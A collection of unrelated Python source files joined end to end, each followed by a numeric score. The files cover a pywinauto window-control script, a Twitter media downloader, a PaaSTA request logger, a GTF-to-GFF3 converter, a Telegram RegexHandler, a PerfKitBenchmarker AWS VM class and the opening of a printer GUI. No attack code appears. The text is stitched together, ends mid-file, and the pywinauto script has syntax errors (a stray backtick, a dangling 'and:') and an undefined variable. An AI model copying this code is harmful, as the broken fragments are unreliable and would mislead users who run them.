assert not kws
if len(args) == 1:
# One-argument type() -> return the __class__
try:
classty = self.context.resolve_getattr(args[0], "__class__")
except KeyError:
return
else:
return signature(classty, *args)
builtin_global(type, types.Function(TypeBuiltin))
| 0.001973 |
# GUI Application automation and testing library
# Copyright (C) 2006 Mark Mc Mahon
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place,
# Suite 330,
# Boston, MA 02111-1307 USA
from application import FindWindows
win = FindWindows(title = "Replace", class_name = "#32770")[0]
from findbestmatch import find_best_match
# get those visible controls that have visible window text
visibleTextChildren = [w for w in win.Children if w.IsVisible and w.Text]
# get those visible controls that do not have visible window text
visibleNonTextChildren = [w for w in win.Children if w.IsVisible and not w.Text]
distance_cuttoff = 999
def FindClosestControl(ctrl, text_ctrls):
name = ctrl.FriendlyClassName()
# now for each of the visible text controls
for text_ctrl in text_ctrls:
# get aliases to the control rectangles
text_r = text_ctrl.Rectangle()
ctrl_r = w2.Rectangle()
# skip controls where w is to the right of ctrl
if text_r.left >= ctrl_r.right:
continue
# skip controls where w is below ctrl
if text_r.top >= ctrl_r.bottom:
continue
# calculate the distance between the controls
` # (x^2 + y^2)^.5
distance = (
(text_r.left - ctrl_r.left) ** 2 + # (x^2 +
(text_r.top - ctrl_r.top) ** 2) \ # y^2)
** .5 # ^.5
# if this distance was closer then the last one
if distance_cuttoff > distance < closest and:
closest = distance
name = text_ctrl.Text.replace(' ', '').replace ('&', '') + ctrl.FriendlyClassName()
return name
# for each of the items that do not have visible text
for w2 in visibleNonTextChildren:
closest = 999
newname = ''
# now for each of the visible text controls
for text_child in visibleTextChildren:
# skip controls where w is to the right of w2
if text_child.Rectangle.left >= w2.Rectangle.right:
continue
# skip controls where w is below w2
if text_child.Rectangle.top >= w2.Rectangle.bottom:
continue
# calculate teh distance to the control
wr = text_child.Rectangle()
w2r = w2.Rectangle()
distance = ((wr.left - w2r.left) ** 2.0 + (wr.top - w2r.top) ** 2.0) ** .5
# if this distance was closer then the last one
if distance < closest:
closest = distance
newname = text_child.Text.replace(' ', '').replace ('&', '') + w2.FriendlyClassName
if closest != 999:
print newname | 0.013442 |
#!/usr/bin/env python
__all__ = ['twitter_download']
from ..common import *
from .vine import vine_download
def extract_m3u(source):
r1 = get_content(source)
s1 = re.findall(r'(/ext_tw_video/.*)', r1)
r2 = get_content('https://video.twimg.com%s' % s1[-1])
s2 = re.findall(r'(/ext_tw_video/.*)', r2)
return ['https://video.twimg.com%s' % i for i in s2]
def twitter_download(url, output_dir='.', merge=True, info_only=False, **kwargs):
html = get_html(url)
screen_name = r1(r'data-screen-name="([^"]*)"', html) or \
r1(r'<meta name="twitter:title" content="([^"]*)"', html)
item_id = r1(r'data-item-id="([^"]*)"', html) or \
r1(r'<meta name="twitter:site:id" content="([^"]*)"', html)
page_title = "{} [{}]".format(screen_name, item_id)
try: # extract images
urls = re.findall(r'property="og:image"\s*content="([^"]+:large)"', html)
assert urls
images = []
for url in urls:
url = ':'.join(url.split(':')[:-1]) + ':orig'
filename = parse.unquote(url.split('/')[-1])
title = '.'.join(filename.split('.')[:-1])
ext = url.split(':')[-2].split('.')[-1]
size = int(get_head(url)['Content-Length'])
images.append({'title': title,
'url': url,
'ext': ext,
'size': size})
size = sum([image['size'] for image in images])
print_info(site_info, page_title, images[0]['ext'], size)
if not info_only:
for image in images:
title = image['title']
ext = image['ext']
size = image['size']
url = image['url']
print_info(site_info, title, ext, size)
download_urls([url], title, ext, size,
output_dir=output_dir)
except: # extract video
# always use i/cards or videos url
if not re.match(r'https?://twitter.com/i/', url):
url = r1(r'<meta\s*property="og:video:url"\s*content="([^"]+)"', html)
if not url:
url = 'https://twitter.com/i/videos/%s' % item_id
html = get_content(url)
data_config = r1(r'data-config="([^"]*)"', html) or \
r1(r'data-player-config="([^"]*)"', html)
i = json.loads(unescape_html(data_config))
if 'video_url' in i:
source = i['video_url']
if not item_id: page_title = i['tweet_id']
elif 'playlist' in i:
source = i['playlist'][0]['source']
if not item_id: page_title = i['playlist'][0]['contentId']
elif 'vmap_url' in i:
vmap_url = i['vmap_url']
vmap = get_content(vmap_url)
source = r1(r'<MediaFile>\s*<!\[CDATA\[(.*)\]\]>', vmap)
if not item_id: page_title = i['tweet_id']
elif 'scribe_playlist_url' in i:
scribe_playlist_url = i['scribe_playlist_url']
return vine_download(scribe_playlist_url, output_dir, merge=merge, info_only=info_only)
try:
urls = extract_m3u(source)
except:
urls = [source]
size = urls_size(urls)
mime, ext = 'video/mp4', 'mp4'
print_info(site_info, page_title, mime, size)
if not info_only:
download_urls(urls, page_title, ext, size, output_dir, merge=merge)
site_info = "Twitter.com"
download = twitter_download
download_playlist = playlist_not_supported('twitter')
| 0.003951 |
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Creates a tween that logs information about requests.
"""
import json
import traceback
from datetime import datetime
import pyramid
import pytz
from paasta_tools.api import settings
try:
import clog
except ImportError:
clog = None
DEFAULT_REQUEST_LOG_NAME = "tmp_paasta_api_requests"
def includeme(config):
if clog is not None:
config.add_tween(
"paasta_tools.api.tweens.request_logger.request_logger_tween_factory",
under=pyramid.tweens.INGRESS,
)
class request_logger_tween_factory:
"""Tween that logs information about requests"""
def __init__(self, handler, registry):
self.handler = handler
self.registry = registry
self.log_name = registry.settings.get(
"request_log_name", DEFAULT_REQUEST_LOG_NAME,
)
def _log(
self, timestamp=None, level="INFO", additional_fields=None,
):
if clog is not None:
# `settings` values are set by paasta_tools.api.api:setup_paasta_api
if not timestamp:
timestamp = datetime.now(pytz.utc)
dct = {
"human_timestamp": timestamp.strftime("%Y-%m-%dT%H:%M:%S%Z"),
"unix_timestamp": timestamp.timestamp(),
"hostname": settings.hostname,
"level": level,
"cluster": settings.cluster,
}
if additional_fields is not None:
dct.update(additional_fields)
line = json.dumps(dct, sort_keys=True)
clog.log_line(self.log_name, line)
def __call__(self, request):
start_time = datetime.now(pytz.utc) # start clock for response time
request_fields = {
"path": request.path,
"params": request.params.mixed(),
"client_addr": request.client_addr,
"http_method": request.method,
"headers": dict(request.headers), # incls user agent
}
response_fields = {}
log_level = "INFO"
try:
response = self.handler(request)
response_fields["status_code"] = response.status_int
if 300 <= response.status_int < 400:
log_level = "WARNING"
elif 400 <= response.status_int < 600:
log_level = "ERROR"
response_fields["body"] = response.body.decode("utf-8")
return response
except Exception as e:
log_level = "ERROR"
response_fields.update(
{
"status_code": 500,
"exc_type": type(e).__name__,
"exc_info": traceback.format_exc(),
}
)
raise
finally:
response_time_ms = (
datetime.now(pytz.utc) - start_time
).total_seconds() * 1000
response_fields["response_time_ms"] = response_time_ms
self._log(
timestamp=start_time,
level=log_level,
additional_fields={
"request": request_fields,
"response": response_fields,
},
)
| 0.000528 |
#!/usr/bin/env python
"""
Convert Gene Transfer Format [GTF] to Generic Feature Format Version 3 [GFF3].
Usage: python gtf_to_gff_conv.py in.gtf > out.gff3
Requirement:
Copyright (C)
2009-2012 Friedrich Miescher Laboratory of the Max Planck Society, Tubingen, Germany.
2012-2013 Memorial Sloan-Kettering Cancer Center New York City, USA.
"""
import sys
import re
from common_util import _open_file, buildUTR, addCDSphase
def GFFWriter(gtf_file_cont):
"""
Write feature details to GFF3
"""
print '##gff-version 3'
for contig, contig_info in sorted(gtf_file_cont.items()): # chromosome
for feature, details in contig_info.items(): # gene with source
gene_start= gene_stop = []
gnames = None
tnames= transcript_details = dict()
for ftid, tinfo in details.items(): # transcripts
tinfo['exon'].sort() # coordinate system in ascending order.
tinfo['CDS'].sort()
if tinfo['exon']:
gene_start.append(tinfo['exon'][0][0])
gene_stop.append(tinfo['exon'][-1][1])
if not gene_start:
continue
orient = tinfo['info'][0]
tnames[ftid]=tinfo['info'][-1]
gnames=tinfo['info'][-2]
if len(tinfo['CDS']) == 0: # non coding transcript
transcript_details[ftid] = dict(info = tinfo['info'],
exon = tinfo['exon'],
tpe = 'transcript')
else:
if tinfo['sp_cod']: # stop codon are seperated from CDS, add the coordinates based on strand
if orient == '+':
if tinfo['sp_cod'][0][0]-tinfo['CDS'][-1][1] == 1:
tinfo['CDS'][-1] = (tinfo['CDS'][-1][0], tinfo['sp_cod'][0][1])
else:
tinfo['CDS'].append(tinfo['sp_cod'][0])
if orient == '-':
if tinfo['CDS'][0][0]-tinfo['sp_cod'][0][1] == 1:
tinfo['CDS'][0] = (tinfo['sp_cod'][0][0], tinfo['CDS'][0][1])
else:
tinfo['CDS'].insert(0, tinfo['sp_cod'][0])
if tinfo['exon']:
utr5, utr3 = buildUTR(tinfo['CDS'], tinfo['exon'], orient) # getting UTR info from CDS and exon.
transcript_details[ftid] = dict(info = tinfo['info'],
exon = tinfo['exon'],
utr5 = utr5,
utr3 = utr3,
cds = tinfo['CDS'],
tpe = 'mRNA')
if gene_start and gene_stop: # displying Gene, transcript and subfeatures
gene_start.sort()
gene_stop.sort()
if gnames == None:
gnames = feature[0] # assign gene name as gene id, if not defined
pline = [str(contig),
feature[1],
'gene',
str(gene_start[0]),
str(gene_stop[-1]),
'.',
orient,
'.',
'ID=' + feature[0] + ';Name=' + gnames]
print '\t'.join(pline)
for dtid, dinfo in transcript_details.items():
if dinfo['info'][3]:
pline = [str(contig),
feature[1],
dinfo['tpe'],
str(dinfo['exon'][0][0]),
str(dinfo['exon'][-1][1]),
dinfo['info'][1],
orient,
'.',
'ID=' + str(dtid) + ';Parent=' + feature[0] + ';Name=' + str(dinfo['info'][3]) ]
else:
pline = [str(contig),
feature[1],
dinfo['tpe'],
str(dinfo['exon'][0][0]),
str(dinfo['exon'][-1][1]),
dinfo['info'][1],
orient,
'.',
'ID=' + dtid + ';Parent=' + feature[0]]
print '\t'.join(pline)
if 'utr5' in dinfo:
for ele in dinfo['utr5']:
pline = [str(contig),
feature[1],
'five_prime_UTR',
str(ele[0]),
str(ele[1]),
'.',
orient,
'.',
'Parent=' + dtid]
print '\t'.join(pline)
if 'cds' in dinfo:
cds_w_phase = addCDSphase(orient, dinfo['cds'])
for ele in cds_w_phase:
pline = [str(contig),
feature[1],
'CDS',
str(ele[0]),
str(ele[1]),
'.',
orient,
str(ele[-1]),
'Parent=' + dtid]
print '\t'.join(pline)
if 'utr3' in dinfo:
for ele in dinfo['utr3']:
pline = [str(contig),
feature[1],
'three_prime_UTR',
str(ele[0]),
str(ele[1]),
'.',
orient,
'.',
'Parent=' + dtid]
print '\t'.join(pline)
if 'exon' in dinfo:
intron_start = 0
for xq, ele in enumerate(dinfo['exon']):
if xq > 0:
pline = [str(contig),
feature[1],
'intron',
str(intron_start),
str(ele[0]-1),
'.',
orient,
'.',
'Parent=' + dtid]
print '\t'.join(pline)
pline = [str(contig),
feature[1],
'exon',
str(ele[0]),
str(ele[1]),
'.',
orient,
'.',
'Parent=' + dtid]
print '\t'.join(pline)
intron_start = ele[1]+1
def getGTFcontent(gtf_file):
"""
Extract GTF features
"""
GFH = _open_file(gtf_file)
gtf_content, recall = dict(), None
for rec in GFH:
rec = rec.strip('\n\r')
#skip empty line fasta identifier and commented line
if not rec or rec[0] in ['#', '>']:
continue
#skip the genome sequence
if not re.search('\t', rec):
continue
parts = rec.split('\t')
assert len(parts) >= 8, rec
if re.search(r'^(start_codon|start-codon|startcodon)$', parts[2], re.IGNORECASE):
continue
gid= tid= gname= tname= ttype = None
for attb in parts[-1].split(';'):
if re.search(r'^\s?$', attb):
continue
attb = re.sub('"', '', attb).strip()
attb = attb.split()
if re.search(r'^(gene_id|geneid|name)$', attb[0], re.IGNORECASE):
gid = attb[1]
elif re.search(r'^(transcript_id|transcriptId)$', attb[0], re.IGNORECASE):
tid = attb[1]
elif re.search(r'^(gene_name|genename)$', attb[0], re.IGNORECASE):
gname = attb[1]
elif re.search(r'^(transcript_name|transcriptname)$', attb[0], re.IGNORECASE):
tname = attb[1]
elif re.search(r'^(transcript_type)$', attb[0], re.IGNORECASE):
ttype = attb[1]
if gid == tid: #UCSC GTF files, gene & transcript have same identifier
gid = 'Gene:'+str(gid)
tid = 'Transcript:'+str(tid)
if tid == None: #JGI GTF file dont have transcript ID for CDS line
tid = recall
exon= cds= sp_cod= st_cod = []
if re.search(r'^exon$', parts[2], re.IGNORECASE):
exon = [(int(parts[3]), int(parts[4]))]
elif re.search(r'^CDS$', parts[2], re.IGNORECASE):
cds = [(int(parts[3]), int(parts[4]))]
elif re.search(r'^(stop_codon|stop-codon|stopcodon)$', parts[2], re.IGNORECASE):
sp_cod = [(int(parts[3]), int(parts[4]))]
else: #other lines are not required to GFF line
continue
#creating feature connections
if parts[0] in gtf_content: # adding to existing chromosome
if (gid, parts[1]) in gtf_content[parts[0]].keys(): # adding to existing gene
if tid in gtf_content[parts[0]][(gid, parts[1])].keys(): # adding to existing transcript
if exon:
gtf_content[parts[0]][(gid, parts[1])][tid]['exon'].append(exon[0])
elif cds:
gtf_content[parts[0]][(gid, parts[1])][tid]['CDS'].append(cds[0])
elif sp_cod:
gtf_content[parts[0]][(gid, parts[1])][tid]['sp_cod'].append(sp_cod[0])
else: # inserting new transcript
gtf_content[parts[0]][(gid, parts[1])][tid] = dict(exon = exon,
CDS = cds,
sp_cod = sp_cod,
info = [parts[6], parts[5], gname, tname, ttype])
else: # inserting new gene
gtf_content[parts[0]][(gid, parts[1])] = {tid : dict(exon = exon,
CDS = cds,
sp_cod = sp_cod,
info = [parts[6], parts[5], gname, tname, ttype])}
else: # inserting new chromosome identifier
gtf_content[parts[0]] = {(gid, parts[1]) : {tid : dict(exon = exon,
CDS = cds,
sp_cod = sp_cod,
info = [parts[6], parts[5], gname, tname, ttype])}}
recall = tid #set previous id for CDS line
GFH.close()
return gtf_content
def __main__():
try:
gtf_fname = sys.argv[1]
except:
print __doc__
sys.exit(-1)
gtf_file_content = getGTFcontent(gtf_fname)
GFFWriter(gtf_file_content)
if __name__ == "__main__":
__main__()
| 0.019887 |
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
""" This module contains the RegexHandler class """
import re
from future.utils import string_types
from .handler import Handler
from telegram import Update
from telegram.utils.deprecate import deprecate
class RegexHandler(Handler):
"""
Handler class to handle Telegram updates based on a regex. It uses a
regular expression to check text messages. Read the documentation of the
``re`` module for more information. The ``re.match`` function is used to
determine if an update should be handled by this handler.
Args:
pattern (str or Pattern): The regex pattern.
callback (function): A function that takes ``bot, update`` as
positional arguments. It will be called when the ``check_update``
has determined that an update should be processed by this handler.
pass_groups (optional[bool]): If the callback should be passed the
result of ``re.match(pattern, text).groups()`` as a keyword
argument called ``groups``. Default is ``False``
pass_groupdict (optional[bool]): If the callback should be passed the
result of ``re.match(pattern, text).groupdict()`` as a keyword
argument called ``groupdict``. Default is ``False``
pass_update_queue (optional[bool]): If set to ``True``, a keyword argument called
``update_queue`` will be passed to the callback function. It will be the ``Queue``
instance used by the ``Updater`` and ``Dispatcher`` that contains new updates which can
be used to insert updates. Default is ``False``.
pass_job_queue (optional[bool]): If set to ``True``, a keyword argument called
``job_queue`` will be passed to the callback function. It will be a ``JobQueue``
instance created by the ``Updater`` which can be used to schedule new jobs.
Default is ``False``.
pass_user_data (optional[bool]): If set to ``True``, a keyword argument called
``user_data`` will be passed to the callback function. It will be a ``dict`` you
can use to keep any data related to the user that sent the update. For each update of
the same user, it will be the same ``dict``. Default is ``False``.
pass_chat_data (optional[bool]): If set to ``True``, a keyword argument called
``chat_data`` will be passed to the callback function. It will be a ``dict`` you
can use to keep any data related to the chat that the update was sent in.
For each update in the same chat, it will be the same ``dict``. Default is ``False``.
"""
def __init__(self,
pattern,
callback,
pass_groups=False,
pass_groupdict=False,
pass_update_queue=False,
pass_job_queue=False,
pass_user_data=False,
pass_chat_data=False,
allow_edited=False,
message_updates=True,
channel_post_updates=False):
super(RegexHandler, self).__init__(
callback,
pass_update_queue=pass_update_queue,
pass_job_queue=pass_job_queue,
pass_user_data=pass_user_data,
pass_chat_data=pass_chat_data)
if isinstance(pattern, string_types):
pattern = re.compile(pattern)
self.pattern = pattern
self.pass_groups = pass_groups
self.pass_groupdict = pass_groupdict
self.allow_edited = allow_edited
self.message_updates = message_updates
self.channel_post_updates = channel_post_updates
def _is_allowed_message(self, update):
return (self.message_updates
and (update.message or (update.edited_message and self.allow_edited)))
def _is_allowed_channel_post(self, update):
return (self.channel_post_updates
and (update.channel_post or (update.edited_channel_post and self.allow_edited)))
def check_update(self, update):
if (isinstance(update, Update)
and (self._is_allowed_message(update) or self._is_allowed_channel_post(update))
and update.effective_message.text):
match = re.match(self.pattern, update.effective_message.text)
return bool(match)
else:
return False
def handle_update(self, update, dispatcher):
optional_args = self.collect_optional_args(dispatcher, update)
match = re.match(self.pattern, update.effective_message.text)
if self.pass_groups:
optional_args['groups'] = match.groups()
if self.pass_groupdict:
optional_args['groupdict'] = match.groupdict()
return self.callback(dispatcher.bot, update, **optional_args)
# old non-PEP8 Handler methods
m = "telegram.RegexHandler."
checkUpdate = deprecate(check_update, m + "checkUpdate", m + "check_update")
handleUpdate = deprecate(handle_update, m + "handleUpdate", m + "handle_update")
| 0.003247 |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class to represent an AWS Virtual Machine object.
All VM specifics are self-contained and the class provides methods to
operate on the VM: boot, shutdown, etc.
"""
import json
import logging
import threading
from perfkitbenchmarker import disk
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import package_managers
from perfkitbenchmarker import virtual_machine
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.aws import aws_disk
from perfkitbenchmarker.aws import util
FLAGS = flags.FLAGS
flags.DEFINE_string('aws_user_name', 'ubuntu',
'This determines the user name that Perfkit will '
'attempt to use. This must be changed in order to '
'use any image other than ubuntu.')
HVM = 'HVM'
PV = 'PV'
NON_HVM_PREFIXES = ['m1', 'c1', 't1', 'm2']
US_EAST_1 = 'us-east-1'
US_WEST_1 = 'us-west-1'
US_WEST_2 = 'us-west-2'
EU_WEST_1 = 'eu-west-1'
AP_NORTHEAST_1 = 'ap-northeast-1'
AP_SOUTHEAST_1 = 'ap-southeast-1'
AP_SOUTHEAST_2 = 'ap-southeast-2'
SA_EAST_1 = 'sa-east-1'
AMIS = {
HVM: {
US_EAST_1: 'ami-acff23c4',
US_WEST_1: 'ami-05717d40',
US_WEST_2: 'ami-fbce8bcb',
EU_WEST_1: 'ami-30b46b47',
AP_NORTHEAST_1: 'ami-d186dcd0',
AP_SOUTHEAST_1: 'ami-9afca7c8',
AP_SOUTHEAST_2: 'ami-956706af',
SA_EAST_1: 'ami-9970d884',
},
PV: {
US_EAST_1: 'ami-d2ff23ba',
US_WEST_1: 'ami-73717d36',
US_WEST_2: 'ami-f1ce8bc1',
EU_WEST_1: 'ami-4ab46b3d',
AP_NORTHEAST_1: 'ami-c786dcc6',
AP_SOUTHEAST_1: 'ami-eefca7bc',
AP_SOUTHEAST_2: 'ami-996706a3',
SA_EAST_1: 'ami-6770d87a',
}
}
PLACEMENT_GROUP_PREFIXES = frozenset(
['c3', 'c4', 'cc2', 'cg1', 'g2', 'cr1', 'r3', 'hi1', 'i2'])
NUM_LOCAL_VOLUMES = {
'c1.medium': 1, 'c1.xlarge': 4,
'c3.large': 2, 'c3.xlarge': 2, 'c3.2xlarge': 2, 'c3.4xlarge': 2,
'c3.8xlarge': 2, 'cc2.8xlarge': 4,
'cg1.4xlarge': 2, 'cr1.8xlarge': 2, 'g2.2xlarge': 1,
'hi1.4xlarge': 2, 'hs1.8xlarge': 24,
'i2.xlarge': 1, 'i2.2xlarge': 2, 'i2.4xlarge': 4, 'i2.8xlarge': 8,
'm1.small': 1, 'm1.medium': 1, 'm1.large': 2, 'm1.xlarge': 4,
'm2.xlarge': 1, 'm2.2xlarge': 1, 'm2.4xlarge': 2,
'm3.medium': 1, 'm3.large': 1, 'm3.xlarge': 2, 'm3.2xlarge': 2,
'r3.large': 1, 'r3.xlarge': 1, 'r3.2xlarge': 1, 'r3.4xlarge': 1,
'r3.8xlarge': 2,
}
DRIVE_START_LETTER = 'b'
INSTANCE_EXISTS_STATUSES = frozenset(
['pending', 'running', 'stopping', 'stopped'])
INSTANCE_DELETED_STATUSES = frozenset(['shutting-down', 'terminated'])
INSTANCE_KNOWN_STATUSES = INSTANCE_EXISTS_STATUSES | INSTANCE_DELETED_STATUSES
def GetBlockDeviceMap(machine_type):
"""Returns the block device map to expose all devices for a given machine.
Args:
machine_type: The machine type to create a block device map for.
Returns:
The json representation of the block device map for a machine compatible
with the AWS CLI, or if the machine type has no local disks, it will
return None.
"""
if machine_type in NUM_LOCAL_VOLUMES:
mappings = [{'VirtualName': 'ephemeral%s' % i,
'DeviceName': '/dev/xvd%s' % chr(ord(DRIVE_START_LETTER) + i)}
for i in xrange(NUM_LOCAL_VOLUMES[machine_type])]
return json.dumps(mappings)
else:
return None
def GetImage(machine_type, region):
"""Gets an ami compatible with the machine type and zone."""
prefix = machine_type.split('.')[0]
if prefix in NON_HVM_PREFIXES:
return AMIS[PV][region]
else:
return AMIS[HVM][region]
def IsPlacementGroupCompatible(machine_type):
"""Returns True if VMs of 'machine_type' can be put in a placement group."""
prefix = machine_type.split('.')[0]
return prefix in PLACEMENT_GROUP_PREFIXES
class AwsVirtualMachine(virtual_machine.BaseVirtualMachine):
"""Object representing an AWS Virtual Machine."""
_lock = threading.Lock()
imported_keyfile_set = set()
deleted_keyfile_set = set()
def __init__(self, vm_spec):
"""Initialize a AWS virtual machine.
Args:
vm_spec: virtual_machine.BaseVirtualMachineSpec object of the vm.
"""
super(AwsVirtualMachine, self).__init__(vm_spec)
self.region = self.zone[:-1]
self.image = self.image or GetImage(self.machine_type, self.region)
self.user_name = FLAGS.aws_user_name
if self.machine_type in NUM_LOCAL_VOLUMES:
self.max_local_disks = NUM_LOCAL_VOLUMES[self.machine_type]
self.local_disk_counter = 0
def ImportKeyfile(self):
"""Imports the public keyfile to AWS."""
with self._lock:
if self.region in self.imported_keyfile_set:
return
cat_cmd = ['cat',
vm_util.GetPublicKeyPath()]
keyfile, _ = vm_util.IssueRetryableCommand(cat_cmd)
import_cmd = util.AWS_PREFIX + [
'ec2', '--region=%s' % self.region,
'import-key-pair',
'--key-name=%s' % 'perfkit-key-%s' % FLAGS.run_uri,
'--public-key-material=%s' % keyfile]
vm_util.IssueRetryableCommand(import_cmd)
self.imported_keyfile_set.add(self.region)
if self.region in self.deleted_keyfile_set:
self.deleted_keyfile_set.remove(self.region)
def DeleteKeyfile(self):
"""Deletes the imported keyfile for a region."""
with self._lock:
if self.region in self.deleted_keyfile_set:
return
delete_cmd = util.AWS_PREFIX + [
'ec2', '--region=%s' % self.region,
'delete-key-pair',
'--key-name=%s' % 'perfkit-key-%s' % FLAGS.run_uri]
vm_util.IssueRetryableCommand(delete_cmd)
self.deleted_keyfile_set.add(self.region)
if self.region in self.imported_keyfile_set:
self.imported_keyfile_set.remove(self.region)
@vm_util.Retry()
def _PostCreate(self):
"""Get the instance's data and tag it."""
describe_cmd = util.AWS_PREFIX + [
'ec2',
'describe-instances',
'--region=%s' % self.region,
'--instance-ids=%s' % self.id]
logging.info('Getting instance %s public IP. This will fail until '
'a public IP is available, but will be retried.', self.id)
stdout, _ = vm_util.IssueRetryableCommand(describe_cmd)
response = json.loads(stdout)
instance = response['Reservations'][0]['Instances'][0]
self.ip_address = instance['PublicIpAddress']
self.internal_ip = instance['PrivateIpAddress']
self.group_id = instance['SecurityGroups'][0]['GroupId']
util.AddDefaultTags(self.id, self.region)
def _CreateDependencies(self):
"""Create VM dependencies."""
self.ImportKeyfile()
def _DeleteDependencies(self):
"""Delete VM dependencies."""
self.DeleteKeyfile()
def _Create(self):
"""Create a VM instance."""
super(AwsVirtualMachine, self)._Create()
placement = 'AvailabilityZone=%s' % self.zone
if IsPlacementGroupCompatible(self.machine_type):
placement += ',GroupName=%s' % self.network.placement_group.name
block_device_map = GetBlockDeviceMap(self.machine_type)
create_cmd = util.AWS_PREFIX + [
'ec2',
'run-instances',
'--region=%s' % self.region,
'--subnet-id=%s' % self.network.subnet.id,
'--associate-public-ip-address',
'--image-id=%s' % self.image,
'--instance-type=%s' % self.machine_type,
'--placement=%s' % placement,
'--key-name=%s' % 'perfkit-key-%s' % FLAGS.run_uri]
if block_device_map:
create_cmd.append('--block-device-mappings=%s' % block_device_map)
stdout, _, _ = vm_util.IssueCommand(create_cmd)
response = json.loads(stdout)
self.id = response['Instances'][0]['InstanceId']
def _Delete(self):
"""Delete a VM instance."""
delete_cmd = util.AWS_PREFIX + [
'ec2',
'terminate-instances',
'--region=%s' % self.region,
'--instance-ids=%s' % self.id]
vm_util.IssueCommand(delete_cmd)
def _Exists(self):
"""Returns true if the VM exists."""
describe_cmd = util.AWS_PREFIX + [
'ec2',
'describe-instances',
'--region=%s' % self.region,
'--filter=Name=instance-id,Values=%s' % self.id]
stdout, _ = vm_util.IssueRetryableCommand(describe_cmd)
response = json.loads(stdout)
reservations = response['Reservations']
assert len(reservations) < 2, 'Too many reservations.'
if not reservations:
return False
instances = reservations[0]['Instances']
assert len(instances) == 1, 'Wrong number of instances.'
status = instances[0]['State']['Name']
assert status in INSTANCE_KNOWN_STATUSES, status
return status in INSTANCE_EXISTS_STATUSES
def CreateScratchDisk(self, disk_spec):
"""Create a VM's scratch disk.
Args:
disk_spec: virtual_machine.BaseDiskSpec object of the disk.
"""
# Instantiate the disk(s) that we want to create.
if disk_spec.disk_type == disk.LOCAL:
disks = []
for _ in range(disk_spec.num_striped_disks):
local_disk = aws_disk.AwsDisk(disk_spec, self.zone)
local_disk.device_letter = chr(ord(DRIVE_START_LETTER) +
self.local_disk_counter)
self.local_disk_counter += 1
disks.append(local_disk)
if self.local_disk_counter > self.max_local_disks:
raise errors.Error('Not enough local disks.')
else:
disks = [aws_disk.AwsDisk(disk_spec, self.zone)
for _ in range(disk_spec.num_striped_disks)]
self._CreateScratchDiskFromDisks(disk_spec, disks)
def GetLocalDisks(self):
"""Returns a list of local disks on the VM.
Returns:
A list of strings, where each string is the absolute path to the local
disks on the VM (e.g. '/dev/sdb').
"""
return ['/dev/xvd%s' % chr(ord(DRIVE_START_LETTER) + i)
for i in xrange(NUM_LOCAL_VOLUMES[self.machine_type])]
def SetupLocalDisks(self):
"""Performs AWS specific setup of local disks."""
# Some images may automount one local disk, but we don't
# want to fail if this wasn't the case.
self.RemoteCommand('sudo umount /mnt', ignore_failure=True)
def AddMetadata(self, **kwargs):
"""Adds metadata to the VM."""
util.AddTags(self.id, self.region, **kwargs)
class DebianBasedAwsVirtualMachine(AwsVirtualMachine,
package_managers.AptMixin):
pass
class RhelBasedAwsVirtualMachine(AwsVirtualMachine,
package_managers.YumMixin):
pass
| 0.004491 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Argentum Control GUI
Copyright (C) 2013 Isabella Stevens
Copyright (C) 2014 Michael Shiel
Copyright (C) 2015 Trent Waddington
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import os
import shutil
import threading
import time
from PyQt4 import QtGui, QtCore, QtSvg
from gerber import Gerber
import requests
from setup import VERSION, BASEVERSION, CA_CERTS
import tempfile
printPlateDesignScale = [1.0757, 1.2256] # * printArea
imageScale = [ 23.70, 23.70] # * print = pixels
class PrintView(QtGui.QWidget):
layout = None
layoutChanged = False
printThread = None
dragging = None
resizing = None
selection = None
selection2 = None
def __init__(self, argentum):
super(PrintView, self).__init__()
self.argentum = argentum
self.lastRect = QtCore.QRect()
self.lastCheckForChanges = time.time()
self.progress = PrintProgressDialog(self)
self.progress.setWindowTitle("Printing")
self.progress.hide()
QtCore.QTimer.singleShot(100, self.progressUpdater)
self.fanSpeed = 4
QtCore.QTimer.singleShot(1000 / self.fanSpeed, self.fanAnimator)
